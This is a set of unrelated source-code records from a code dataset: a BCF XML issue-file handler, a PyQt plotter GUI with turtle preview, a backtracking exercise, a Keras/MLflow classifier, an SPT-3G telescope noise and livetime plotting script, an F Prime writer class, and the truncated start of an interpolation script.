viewpoint.guid:\n viewpoint.guid = str(uuid.uuid4())\n if not viewpoint.viewpoint:\n viewpoint.viewpoint = f\"{viewpoint.guid}.bcfv\"\n if viewpoint.snapshot:\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filepath = os.path.join(topic_filepath, viewpoint.snapshot)\n if not os.path.exists(filepath):\n filename = viewpoint.guid + os.path.splitext(viewpoint.snapshot)[-1]\n copyfile(viewpoint.snapshot, os.path.join(topic_filepath, filename))\n viewpoint.snapshot = filename\n topic.viewpoints[viewpoint.guid] = viewpoint\n self.edit_topic(topic)\n\n def delete_viewpoint(self, guid, topic):\n if guid not in topic.viewpoints:\n return\n viewpoint = topic.viewpoints[guid]\n if viewpoint.snapshot:\n filepath = os.path.join(self.filepath, topic.guid, viewpoint.snapshot)\n if os.path.exists(filepath):\n os.remove(filepath)\n if viewpoint.viewpoint:\n filepath = os.path.join(self.filepath, topic.guid, viewpoint.viewpoint)\n if os.path.exists(filepath):\n os.remove(filepath)\n for bitmap in viewpoint.bitmaps:\n if not bitmap.reference:\n continue\n filepath = os.path.join(self.filepath, topic.guid, bitmap.reference)\n if os.path.exists(filepath):\n os.remove(filepath)\n del topic.viewpoints[guid]\n self.edit_topic(topic)\n\n def delete_file(self, topic, index):\n if not topic.header:\n return\n f = topic.header.files.pop(index)\n filepath = os.path.join(self.filepath, topic.guid, f.reference)\n if not f.is_external and os.path.exists(filepath):\n os.remove(filepath)\n self.edit_topic(topic)\n\n def delete_bim_snippet(self, topic):\n if not topic.bim_snippet:\n return\n if topic.bim_snippet.reference and not topic.bim_snippet.is_external:\n filepath = os.path.join(\n self.filepath, topic.guid, topic.bim_snippet.reference\n )\n if os.path.exists(filepath):\n os.remove(filepath)\n topic.bim_snippet = None\n self.edit_topic(topic)\n\n def delete_document_reference(self, topic, index):\n document_reference = topic.document_references[index]\n if (\n document_reference.referenced_document\n and not document_reference.is_external\n ):\n filepath = os.path.join(\n self.filepath, topic.guid, document_reference.referenced_document\n )\n if os.path.exists(filepath):\n os.remove(filepath)\n del topic.document_references[index]\n self.edit_topic(topic)\n\n def add_document_reference(self, topic, document_reference):\n if os.path.exists(document_reference.referenced_document):\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filename = os.path.basename(document_reference.referenced_document)\n copyfile(\n document_reference.referenced_document,\n os.path.join(topic_filepath, filename),\n )\n document_reference.referenced_document = filename\n document_reference.is_external = False\n else:\n document_reference.is_external = True\n if not document_reference.guid:\n document_reference.guid = str(uuid.uuid4())\n topic.document_references.append(document_reference)\n self.edit_topic(topic)\n\n def add_bim_snippet(self, topic, bim_snippet):\n if topic.bim_snippet:\n self.delete_bim_snippet(topic)\n if os.path.exists(bim_snippet.reference):\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filename = os.path.basename(bim_snippet.reference)\n copyfile(bim_snippet.reference, os.path.join(topic_filepath, filename))\n bim_snippet.reference = filename\n bim_snippet.is_external = False\n else:\n bim_snippet.is_external = True\n topic.bim_snippet = bim_snippet\n self.edit_topic(topic)\n\n def add_file(self, topic, header_file):\n if os.path.exists(header_file.reference):\n topic_filepath = 
os.path.join(self.filepath, topic.guid)\n header_file.filename = os.path.basename(header_file.reference)\n copyfile(\n header_file.reference,\n os.path.join(topic_filepath, header_file.filename),\n )\n header_file.reference = header_file.filename\n header_file.is_external = False\n header_file.date = datetime.utcnow().isoformat()\n if not topic.header:\n topic.header = bcf.data.Header()\n topic.header.files.append(header_file)\n self.edit_topic(topic)\n\n def get_comments(self, guid):\n comments = {}\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Comment\" not in data:\n return comments\n for item in data[\"Comment\"]:\n comment = bcf.data.Comment()\n mandatory_keys = {\n \"guid\": \"@Guid\",\n \"date\": \"Date\",\n \"author\": \"Author\",\n \"comment\": \"Comment\",\n }\n for key, value in mandatory_keys.items():\n setattr(comment, key, item[value])\n optional_keys = {\n \"modified_date\": \"ModifiedDate\",\n \"modified_author\": \"ModifiedAuthor\",\n }\n for key, value in optional_keys.items():\n if value in item:\n setattr(comment, key, item[value])\n if \"Viewpoint\" in item:\n viewpoint = bcf.data.Viewpoint()\n viewpoint.guid = item[\"Viewpoint\"][\"@Guid\"]\n comment.viewpoint = viewpoint\n comments[comment.guid] = comment\n self.topics[guid].comments = comments\n return comments\n\n def get_viewpoints(self, guid):\n viewpoints = {}\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Viewpoints\" not in data:\n return viewpoints\n for item in data[\"Viewpoints\"]:\n viewpoint = self.get_viewpoint(item, guid)\n viewpoints[viewpoint.guid] = viewpoint\n self.topics[guid].viewpoints = viewpoints\n return viewpoints\n\n def get_viewpoint(self, data, topic_guid):\n viewpoint = bcf.data.Viewpoint()\n viewpoint.guid = data[\"@Guid\"]\n optional_keys = {\n \"viewpoint\": \"Viewpoint\",\n \"snapshot\": \"Snapshot\",\n \"index\": \"Index\",\n }\n for key, value in optional_keys.items():\n if value in data:\n setattr(viewpoint, key, data[value])\n visinfo = self._read_xml(\n os.path.join(topic_guid, viewpoint.viewpoint), \"visinfo.xsd\"\n )\n viewpoint.components = self.get_viewpoint_components(visinfo)\n viewpoint.orthogonal_camera = self.get_viewpoint_orthogonal_camera(visinfo)\n viewpoint.perspective_camera = self.get_viewpoint_perspective_camera(visinfo)\n viewpoint.lines = self.get_viewpoint_lines(visinfo)\n viewpoint.clipping_planes = self.get_viewpoint_clipping_planes(visinfo)\n viewpoint.bitmaps = self.get_viewpoint_bitmaps(visinfo)\n return viewpoint\n\n def get_viewpoint_components(self, visinfo):\n if \"Components\" not in visinfo:\n return None\n components = bcf.data.Components()\n data = visinfo[\"Components\"]\n if \"ViewSetupHints\" in data:\n view_setup_hints = bcf.data.ViewSetupHints()\n optional_keys = {\n \"spaces_visible\": \"@SpacesVisible\",\n \"space_boundaries_visible\": \"@SpaceBoundariesVisible\",\n \"openings_visible\": \"@OpeningsVisible\",\n }\n for key, value in optional_keys.items():\n if value in data[\"ViewSetupHints\"]:\n setattr(view_setup_hints, key, data[\"ViewSetupHints\"][value])\n components.view_setup_hints = view_setup_hints\n if \"Selection\" in data and \"Component\" in data[\"Selection\"]:\n for item in data[\"Selection\"][\"Component\"]:\n components.selection.append(self.get_component(item))\n if \"Visibility\" in data:\n component_visibility = bcf.data.ComponentVisibility()\n if \"@DefaultVisibility\" in data[\"Visibility\"]:\n component_visibility.default_visibility = 
data[\"Visibility\"][\n \"@DefaultVisibility\"\n ]\n if (\n \"Exceptions\" in data[\"Visibility\"]\n and \"Component\" in data[\"Visibility\"][\"Exceptions\"]\n ):\n for item in data[\"Visibility\"][\"Exceptions\"][\"Component\"]:\n component_visibility.exceptions.append(self.get_component(item))\n components.visibility = component_visibility\n if \"Coloring\" in data and \"Color\" in data[\"Coloring\"]:\n for item in data[\"Coloring\"][\"Color\"]:\n color = bcf.data.Color()\n color.color = item[\"@Color\"]\n for item2 in item[\"Component\"]:\n color.components.append(self.get_component(item2))\n components.coloring.append(color)\n return components\n\n def get_viewpoint_orthogonal_camera(self, visinfo):\n if \"OrthogonalCamera\" not in visinfo:\n return None\n camera = bcf.data.OrthogonalCamera()\n data = visinfo[\"OrthogonalCamera\"]\n self.set_vector(camera.camera_view_point, data[\"CameraViewPoint\"])\n self.set_vector(camera.camera_direction, data[\"CameraDirection\"])\n self.set_vector(camera.camera_up_vector, data[\"CameraUpVector\"])\n camera.view_to_world_scale = data[\"ViewToWorldScale\"]\n return camera\n\n def get_viewpoint_perspective_camera(self, visinfo):\n if \"PerspectiveCamera\" not in visinfo:\n return None\n camera = bcf.data.PerspectiveCamera()\n data = visinfo[\"PerspectiveCamera\"]\n self.set_vector(camera.camera_view_point, data[\"CameraViewPoint\"])\n self.set_vector(camera.camera_direction, data[\"CameraDirection\"])\n self.set_vector(camera.camera_up_vector, data[\"CameraUpVector\"])\n camera.field_of_view = data[\"FieldOfView\"]\n return camera\n\n def get_viewpoint_lines(self, visinfo):\n if \"Lines\" not in visinfo:\n return []\n lines = []\n for item in visinfo[\"Lines\"][\"Line\"]:\n line = bcf.data.Line()\n self.set_vector(line.start_point, item[\"StartPoint\"])\n self.set_vector(line.end_point, item[\"EndPoint\"])\n lines.append(line)\n return lines\n\n def get_viewpoint_clipping_planes(self, visinfo):\n if \"ClippingPlanes\" not in visinfo:\n return []\n planes = []\n for item in visinfo[\"ClippingPlanes\"][\"ClippingPlane\"]:\n plane = bcf.data.ClippingPlane()\n self.set_vector(plane.location, item[\"Location\"])\n self.set_vector(plane.direction, item[\"Direction\"])\n planes.append(plane)\n return planes\n\n def get_viewpoint_bitmaps(self, visinfo):\n if \"Bitmap\" not in visinfo:\n return []\n bitmaps = []\n for item in visinfo[\"Bitmap\"]:\n bitmap = bcf.data.Bitmap()\n bitmap.reference = item[\"Reference\"]\n bitmap.bitmap_type = item[\"Bitmap\"].upper()\n self.set_vector(bitmap.location, item[\"Location\"])\n self.set_vector(bitmap.normal, item[\"Normal\"])\n self.set_vector(bitmap.up, item[\"Up\"])\n bitmap.height = item[\"Height\"]\n bitmaps.append(bitmap)\n return bitmaps\n\n def set_vector(self, to_obj, from_xml):\n to_obj.x = from_xml[\"X\"]\n to_obj.y = from_xml[\"Y\"]\n to_obj.z = from_xml[\"Z\"]\n\n def get_component(self, data):\n component = bcf.data.Component()\n optional_keys = {\n \"originating_system\": \"OriginatingSystem\",\n \"authoring_tool_id\": \"AuthoringToolId\",\n \"ifc_guid\": \"@IfcGuid\",\n }\n for key, value in optional_keys.items():\n if value in data:\n setattr(component, key, data[value])\n return component\n\n def close_project(self):\n shutil.rmtree(self.filepath)\n\n def _read_xml(self, filename, xsd):\n schema = XMLSchema(os.path.join(cwd, \"xsd\", xsd))\n filepath = os.path.join(self.filepath, filename)\n (data, errors) = schema.to_dict(filepath, validation=\"lax\")\n for error in errors:\n 
            self.logger.error(error)\n        return data\n\n    def _create_element(self, parent, name, attributes=None, text=None):\n        # avoid a shared mutable default argument\n        attributes = attributes if attributes is not None else {}\n        element = self.document.createElement(name)\n        for key, value in attributes.items():\n            if isinstance(value, bool):\n                element.setAttribute(key, str(value).lower())\n            elif value:\n                element.setAttribute(key, value)\n        if text is not None:\n            text = self.document.createTextNode(str(text))\n            element.appendChild(text)\n        parent.appendChild(element)\n        return element\n\n    def __del__(self):\n        self.close_project()\n
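\n# Hedged usage sketch (not part of the original module). Each call below is a\n# method defined above; the output path is illustrative only:\n#\n#   bcf = BcfXml()\n#   bcf.new_project()\n#   topic = bcf.add_topic()\n#   bcf.add_comment(topic)\n#   bcf.save_project('/tmp/new_project.bcf')\n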
","sub_path":"bcf/bcfxml.py","file_name":"bcfxml.py","file_ext":"py","file_size_in_byte":34083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"648392174","text":"# -*- coding: cp1252 -*-\nimport sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nfrom files import *\nimport os\nimport turtle\n\n\n\n\nclass Trace:\n    \n    def __init__(self, decalageX, decalageY, largeurPouces, numeroPort, fileName):\n        self.decalageX = decalageX\n        self.decalageY = decalageY\n        self.largeurImage = largeurPouces\n        self.numeroPort = numeroPort\n        self.fileName = fileName\n        self.POINTSPARPOUCE = 2540.0\n        self.fichierDebut = \"C:\\\\Python34\\\\Lib\\\\Plotter\\\\BEGIN.txt\"\n        self.fichierFin = \"C:\\\\Python34\\\\Lib\\\\Plotter\\\\END.txt\"\n        self.fichierSortie = \"resultat.plt\"\n\n    def genererTuples(self):\n        self.lines = []\n        with open(self.fileName, 'r') as f:\n            data = f.readlines()\n        for line in data:\n            line = line.replace(',', ' ') # keep the result; str.replace does not mutate\n            l = []\n            line = line.strip(\"\\n\").strip(';')\n            l.append(line[:2])\n            rest = line[2:]\n            division = rest.split(' ')\n            if len(division) > 1:\n                l.append(int(division[0]))\n                l.append(int(division[1]))\n            self.lines.append(l)\n        \n        \n        i=0\n        while i < len(self.lines):\n            if len(self.lines[i]) != 3:\n                self.lines.remove(self.lines[i])\n            else:\n                i+=1\n    def definirMinMax(self):\n        self.minX = 9999999\n        self.maxX = -9999999\n        self.minY = 999999999\n        self.maxY = -9999999\n\n        for line in self.lines:\n            if line[1] < self.minX:\n                self.minX = line[1]\n            if line[1] > self.maxX:\n                self.maxX = line[1]\n            if line[2] < self.minY:\n                self.minY = line[2]\n            if line[2] > self.maxY:\n                self.maxY = line[2]\n    \n    def definirRatio(self):\n        largeur = self.maxX-self.minX\n        self.ratio = self.largeurImage*self.POINTSPARPOUCE/largeur\n    \n    def rotater90(self):\n        self.lines = [[line[0], line[2], -line[1]] for line in self.lines]\n    \n    def mettreAZero(self):\n        self.definirMinMax()\n        self.lines = [[line[0], line[1]-self.minX, line[2]-self.minY] for line in self.lines]\n\n    def mettreAEchelle(self):\n        self.lines = [[line[0], line[1]*self.ratio, line[2]*self.ratio] for line in self.lines]\n\n    def decaler(self):\n        self.lines = [[line[0], line[1]+self.decalageX*self.POINTSPARPOUCE, line[2]+self.decalageY*self.POINTSPARPOUCE] for line in self.lines]\n\n    def previewTurtle(self):\n        largeurMachine = 47.6\n        hauteurMachine = 32.2\n        winW = 1000\n        winH = winW*hauteurMachine/40\n        largeur = self.maxX-self.minX\n        hauteur = self.maxY-self.minY\n        ratio = winW/largeurMachine/self.POINTSPARPOUCE\n        tempLines = [[line[0], line[2]*ratio, line[1]*ratio] for line in self.lines]\n        turtle.setup(winW+40, winH+40, 0, 0)\n        pen = turtle.Turtle()\n        pen.up()\n        pen.speed(0)\n        pen.goto(-winW/2, -winH/2)\n        pen.down()\n        pen.goto(-winW/2, winH/2)\n        pen.goto(winW/2,winH/2)\n        pen.goto(winW/2,-winH/2)\n        pen.goto(-winW/2, -winH/2)\n        pen.up()\n        pen.speed(3)\n        pen.down()\n        horsLimite = False\n        for line in tempLines:\n            if abs(line[1]) < winW and abs(line[2]) < winH:\n                if horsLimite:\n                    pen.up()\n                    pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n                    horsLimite = False\n                if line[0] == \"PU\":\n                    pen.up()\n                    pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n                    pen.down()\n                    pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n                else:\n                    pen.down()\n                    pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n            else:\n                pen.up()\n                horsLimite = True\n                print(line[1])\n        pen.up()\n        pen.speed(1)\n        pen.goto(-(winW/2-20), winH/2-20)\n        turtle.done()\n    def convertirEnString(self):\n        self.lines = [line[0] + str(int(line[1])) +',' + str(int(line[2])) +\";\\n\" for line in self.lines]\n    \n    def tracer(self):\n        # start with the plotter's BEGIN block, then the data, then the END block\n        chaine = lireFichier(self.fichierDebut)\n        chaine += ''.join(self.lines)\n        chaine += lireFichier(self.fichierFin)\n        ecrireFichier(self.fichierSortie, chaine)\n        out1 = \"mode \" + self.numeroPort + \" 19200, n, 8, 1, p\"\n        out2 = 'copy /b ' + self.fichierSortie + ' ' +self.numeroPort\n        #os.system(out1)\n        #os.system(out2)\n        print(out1)\n        print(out2)\n        os.remove(self.fichierSortie)\n    \n    def genererLines(self):\n        self.genererTuples()\n        self.definirMinMax()\n        self.definirRatio()\n        self.rotater90()\n        self.mettreAZero()\n        self.mettreAEchelle()\n        self.decaler()\n    \n    def procedureApercu(self):\n        self.genererLines()\n        self.previewTurtle()\n\n    def procedureTracer(self):\n        self.genererLines()\n        self.convertirEnString()\n        self.tracer()\n\nform_class = uic.loadUiType(\"untitled.ui\")[0]               # Load the UI\n \nclass MyWindowClass(QtGui.QMainWindow, form_class):\n    def __init__(self, parent=None):\n        QtGui.QMainWindow.__init__(self, parent)\n        self.setupUi(self)\n        self.btnParcourir.clicked.connect(self.btn_Parcourir_clicked)               # Bind the event handlers\n        self.btnApercu.clicked.connect(self.btn_Apercu_clicked)\n        self.btnImprimer.clicked.connect(self.btn_Imprimer_clicked)\n        self.btnQuitter.clicked.connect(self.btn_Quitter_clicked)\n\n    def bonnesValeurs(self, decalageX, decalageY, largeurImage, numeroPort, nomFichier):\n        if not decalageX.isnumeric():\n            return False\n        elif not decalageY.isnumeric():\n            return False\n        elif not largeurImage.isnumeric():\n            return False\n        elif numeroPort.upper() not in [\"COM\"+str(i) for i in range(1, 5)]:\n            return False\n        elif not nomFichier.endswith(\".plt\"):\n            return False\n        return True\n\n    def btn_Parcourir_clicked(self):\n        fname = QtGui.QFileDialog.getOpenFileName(self, 'Open file')\n        self.labelFichier.setText(fname)\n    \n    def getTrace(self):\n        if self.bonnesValeurs(self.entryEspaceX.text(), \\\n                              self.entryEspaceY.text(), \\\n                              self.entryLargeur.text(), \\\n                              self.entryPort.text(), \\\n                              self.labelFichier.text()):\n            nomFichier = self.labelFichier.text()\n            decalageX = float(self.entryEspaceX.text())\n            decalageY = float(self.entryEspaceY.text())\n            largeurImage = float(self.entryLargeur.text())\n            numeroPort = self.entryPort.text()\n            return Trace(decalageX, decalageY, largeurImage, numeroPort, nomFichier)\n        return None\n    \n    def btn_Apercu_clicked(self):\n        trace = self.getTrace()\n        if trace != None:\n            trace.procedureApercu()\n    \n    def btn_Imprimer_clicked(self):\n        trace = self.getTrace()\n        if trace != None:\n            trace.procedureTracer()\n    def btn_Quitter_clicked(self):\n        self.close()\n    \napp = QtGui.QApplication(sys.argv)\nmyWindow = MyWindowClass(None)\nmyWindow.show()\napp.exec_()\n","sub_path":"Python/Plotter/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"14707107","text":"def backtracking(idx, count, data):\n    global cnt\n    \n    if idx + data[idx] >= data[0]:\n        if count < cnt:\n            cnt = count\n        return\n    \n    if count > cnt:\n        return\n    \n    start_battery = 
data[idx]\n for i in range(1, start_battery + 1):\n backtracking(idx + i, count + 1, data)\n\nif __name__ == \"__main__\":\n \n T = int(input())\n \n for tc in range(1, T + 1):\n cnt = 100000\n data_list = list(map(int, input().split()))\n \n backtracking(1, 0, data_list)\n \n print(\"#{} {}\".format(tc, cnt))","sub_path":"SW_Expert_Academy/문제풀이/Programming Advanced/5208.py","file_name":"5208.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"507517774","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport mlflow\nimport mlflow.keras\n#reading the data\ntrain_data=pd.read_csv('train.csv')\ntrain_data.head(5)\n#mlflow.set_tracking_uri(\"http://10.42.204.118:8000\")\n#exp_id=mlflow.create_experiment(\"sequential CNN\")\n\nX = train_data.iloc[:,:20].values\ny = train_data.iloc[:,20:21].values\n\nsc = StandardScaler()\nX = sc.fit_transform(X)\nohe = OneHotEncoder()\n#encoding classes into binary values\ny = ohe.fit_transform(y).toarray()\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1)\nwith mlflow.start_run():\n #using autologging for logging parameters,metrics etc.\n mlflow.keras.autolog()\n #Building Neural network\n model = Sequential()\n model.add(Dense(16, input_dim=20, activation='relu'))\n model.add(Dense(12, activation='relu'))\n #model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n history = model.fit(X_train, y_train, epochs=100, batch_size=32)\n\n y_pred = model.predict(X_test)\n\n #Converting predictions to label\n pred = list()\n for i in range(len(y_pred)):\n pred.append(np.argmax(y_pred[i]))\n #Converting one hot encoded test label to label\n test = list()\n for i in range(len(y_test)):\n test.append(np.argmax(y_test[i]))\n a = accuracy_score(pred,test)\n print('Accuracy is:', a*100)\n","sub_path":"SequentialCNN.py","file_name":"SequentialCNN.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"129829378","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom spt3g import core, calibration\nimport os.path\nfrom datetime import datetime\nfrom spt3g.std_processing import obsid_to_g3time\nimport matplotlib\nimport matplotlib.dates as mdates\nfrom glob import glob\nfrom spt3g.mapspectra.apodmask import make_border_apodization\n\ncolor = {90:'C0', 150:'C1', 220:'C2'}\nfields = ['ra0hdec-44.75', 'ra0hdec-52.25', 'ra0hdec-59.75', 'ra0hdec-67.25']\ntstart = datetime(year=2019, month=1, day=1).timestamp()\ntstop = datetime(year=2019, month=9, day=10).timestamp()\nsunset = mdates.date2num(datetime(year=2019, month=3, day=21))\n\n\n# Let's calculate the duration of a field scan excluding turnarounds\n# (i.e the relevant length for noise estimates)\nscan_time = 0\nrawdata_path = '/spt/data/bolodata/downsampled/ra0hdec-44.75/84783979'\nd = list(core.G3File(os.path.join(rawdata_path, '0000.g3')))\nfor fname in glob(os.path.join(rawdata_path, '0*.g3')):\n print(fname)\n d = list(core.G3File(os.path.join(fname)))\n for fr in d:\n if fr.type == core.G3FrameType.Scan and \\\n 'Turnaround' not in fr:\n scan_time += 
(fr['DetectorSampleTimes'][-1].time -\n fr['DetectorSampleTimes'][0].time)\n\n# load the coadded maps to get the weights and area of the uniform coverage region\ncoadd_path = '/spt/user/weiquan/map_quality/hi_res_maps/yearly/2019/'\ncoadd_fnames = {band: {field: os.path.join(coadd_path, 'coadded_maps_from_{}_{}GHz.g3.gz'.format(field, band))\n for field in fields} for band in [90, 150, 220]}\ncoadd_TT_weights = {}\nweights_ratio = {}\narea_uniform_coverage = {}\nfor band in coadd_fnames.keys():\n if band not in coadd_TT_weights.keys():\n coadd_TT_weights[band] = {}\n weights_ratio[band] = {}\n area_uniform_coverage[band] = {}\n \n for field in fields:\n print('Loading: {}'.format(coadd_fnames[band][field]))\n coadd_data = list(core.G3File(coadd_fnames[band][field]))\n\n # get weights\n coadd_TT_weights[band][field] = coadd_data[2]['Wunpol'].TT + coadd_data[3]['Wunpol'].TT\n\n # calculate apodization mask\n apod_mask_uniform = make_border_apodization(coadd_TT_weights[band][field],\n apod_type='tophat',\n weight_threshold=0.9)\n\n weights_ratio[band][field] = np.sum(coadd_TT_weights[band][field] * apod_mask_uniform) / \\\n np.sum(coadd_TT_weights[band][field])\n area_uniform_coverage[band][field] = np.sum(apod_mask_uniform) * (apod_mask_uniform.res)**2\n\n# load the analysis summary files to get the noise levels\nnoise_summary_path = '/spt/user/weiquan/map_quality/hi_res_maps/monthly/all_months'\nnoise_summary_fnames = {band: os.path.join(noise_summary_path, 'all_analysis_results_{}GHz.g3'.format(band))\n for band in [90, 150, 220]}\nobsids_nets = {}\nnoises = {}\nnets = {}\nfor band in noise_summary_fnames.keys():\n if band not in obsids_nets.keys():\n obsids_nets[band] = {}\n noises[band] = {}\n nets[band] = {}\n \n noise_summary = list(core.G3File(noise_summary_fnames[band]))\n \n for field in fields:\n\n obsids_nets[band][field] = np.array([k for k in noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"]\\\n [field].keys()])\n noises[band][field] = np.array([noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"][field][k] \\\n for k in noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"][field].keys()])\n nets[band][field] = noises[band][field] / np.sqrt(area_uniform_coverage[band][field]) * \\\n np.sqrt(scan_time * weights_ratio[band][field])\n\n# find all observations with obsids that fall between start and stop\nobsids_all = []\ndirnames_all = []\nfor source in ['ra0hdec-44.75', 'ra0hdec-52.25',\n 'ra0hdec-59.75', 'ra0hdec-67.25']:\n dirnames = np.array(glob('/spt/data/bolodata/downsampled/{}/*'.format(source)))\n obsids = np.array([int(dirname.split('/')[-1]) for dirname in dirnames])\n times = np.array([obsid_to_g3time(obsid).time/core.G3Units.second\n for obsid in obsids])\n obsids_all = np.append(obsids_all, obsids[(times < tstop) & (times > tstart)])\n dirnames_all = np.append(dirnames_all, dirnames[(times < tstop) & (times > tstart)])\n\n# find start and stop time of each observation\nobs_tstart = []\nobs_tstop = []\nfor dirname in dirnames_all:\n print(dirname)\n f = core.G3File('{}/0000.g3'.format(dirname))\n fr = f.next()\n try:\n obs_tstart.append(fr[\"ObservationStart\"].time/core.G3Units.second)\n obs_tstop.append(fr[\"ObservationStop\"].time/core.G3Units.second)\n except KeyError:\n pass\nobs_tstart = np.sort(np.array(obs_tstart))\nobs_tstop = np.sort(np.array(obs_tstop))\ntlive = obs_tstop - obs_tstart\nepoch_tstart = mdates.epoch2num(obs_tstart)\n\n# set up months boundaries for x ticks\nmonth_times = np.array([mdates.date2num(datetime(year=2019, month=jmonth, day=1)) for 
jmonth in np.arange(1,10)])\nmonth_times = np.append(month_times, mdates.date2num(datetime(year=2019, month=9, day=10)))\n\n# set up bin edges for binning\nbin_times = np.linspace(mdates.epoch2num(tstart),\n mdates.epoch2num(tstop), 30) \nmonth_lengths = bin_times[1:] - bin_times[:-1]\njbins = np.digitize(mdates.epoch2num(obs_tstart), bin_times) - 1\n\n\nmatplotlib.rcParams.update({'font.size': 13})\n\nfig = plt.figure(figsize=(12,7))\n\nax_top = plt.subplot(3,1,1)\nplt.ylabel('livetime fraction\\non CMB')\n_ = plt.hist(mdates.epoch2num(obs_tstart),\n weights=tlive / (3600*24) / month_lengths[jbins],\n bins=bin_times,\n color='C1', alpha=0.3)\n_ = plt.hist(mdates.epoch2num(obs_tstart),\n weights=tlive / (3600*24) / month_lengths[jbins],\n bins=bin_times,\n color='C1', histtype='step')\nplt.ylim([0,0.8])\nplt.grid()\n\n\nplt.subplot(3,1,2,sharex=ax_top)\nfor band in nets.keys():\n for field in fields:\n times_nets = np.array([mdates.epoch2num(obsid_to_g3time(ob).time/core.G3Units.sec) \\\n for ob in obsids_nets[band][field]])\n net_threshold = 6*core.G3Units.microkelvin * np.sqrt(core.G3Units.sec)\n plt.plot(times_nets[nets[band][field] > net_threshold],\n nets[band][field][nets[band][field] > net_threshold] / \\\n (core.G3Units.microkelvin * np.sqrt(core.G3Units.sec)), '.',\n markersize=2, color=color[band])\nplt.ylim([0, 39.7])\nplt.xlabel('observation ID')\nplt.ylabel('NET [$\\mu$K$\\sqrt{s}$]')\nplt.tight_layout()\nplt.grid()\n\n\nband_labels = {90:'95 GHz', 150:'150 GHz', 220:'220 GHz'}\nplt.subplot(3,1,3,sharex=ax_top)\nfor band in [90, 150, 220]:\n noise_dict = {}\n obsids_dict = {}\n for field in fields:\n d = list(core.G3File('/home/nadolski/3G_INST_PAPER_FIG_GEN/data/'\n 'some_analysis_results_{}GHz.g3'.format(band)))[0]\n noise = np.array([d[\"NoiseLevelsFromCoaddedTMaps\"][field][obsid] \\\n for obsid in d[\"NoiseLevelsFromCoaddedTMaps\"][field].keys()])\n noise = noise / (core.G3Units.microkelvin * core.G3Units.arcmin)\n obsids = [int(obsid) for obsid in d[\"NoiseLevelsFromCoaddedTMaps\"][field].keys()]\n noise_dict[field] = noise\n obsids_dict[field] = obsids\n \n max_min_obsid = np.max([np.min(obsids_dict[field]) for field in obsids_dict])\n min_max_obsid = np.min([np.max(obsids_dict[field]) for field in obsids_dict])\n obsids_interp = np.linspace(max_min_obsid, min_max_obsid, 500)\n times_interp = np.array([mdates.epoch2num(obsid_to_g3time(ob).time/core.G3Units.sec) for ob in obsids_interp])\n noise_interp = np.sum(np.vstack([np.interp(obsids_interp, obsids_dict[field], noise_dict[field])\n for field in fields]), axis=0) / 4\n \n plt.semilogy(times_interp, noise_interp, label=band_labels[band])\n\n\nplt.legend()\nplt.grid()\nplt.ylabel('cumulative map\\ndepth [$\\mu$K arcmin]')\n\nplt.tight_layout()\nfig.subplots_adjust(hspace=0)\n\nplt.savefig('livetime_noise_summary.pdf')\n","sub_path":"20190329_gainmatching/livetime_noise.py","file_name":"livetime_noise.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59265397","text":"# ===============================================================================\n# NAME: ImplWriterBase.py\n#\n# DESCRIPTION: A base class for Impl writers\n#\n# AUTHOR: Jordan Ishii\n# EMAIL: jordan.ishii@jpl.nasa.gov\n# DATE CREATED : August 8, 2019\n#\n# Copyright 2015, California Institute of Technology.\n# ALL RIGHTS RESERVED. U.S. 
Government Sponsorship acknowledged.\n# ===============================================================================\n\nfrom fprime_ac.generators.writers import ComponentWriterBase\n\n\nclass ImplWriterBase(ComponentWriterBase.ComponentWriterBase):\n \"\"\"\n A base class for Impl writers\n \"\"\"\n\n def initImpl(self, obj, c):\n self.init(obj, c)\n c.component_base = c.name() + \"ComponentBase\"\n c.impl = c.name() + \"Impl\"\n","sub_path":"Autocoders/Python/src/fprime_ac/generators/writers/ImplWriterBase.py","file_name":"ImplWriterBase.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392479636","text":"#!/usr/bin/env python3\n\n##############################\n#Author: Albert Szadziński #\n#Date:19.12.16 #\n##############################\n\n\"\"\"\nPolynomial & trigonometric interpolation\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\ndef draw(*args):\n plt.plot(*args)\n plt.grid(True)\n #plt.xlim(args[0][0],args[0][-1])\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\ndef interpol_poly(x,y,X):\n hp = 0.0\n for i in range(len(y)):\n h = 1\n for j in range(len(y)):\n if j != i:\n h *= (X-x[j])/(x[i]-x[j])\n hp += y[i]*h\n return hp\n\n\n\ndef interpol_tryg(x,y,X):\n from math import 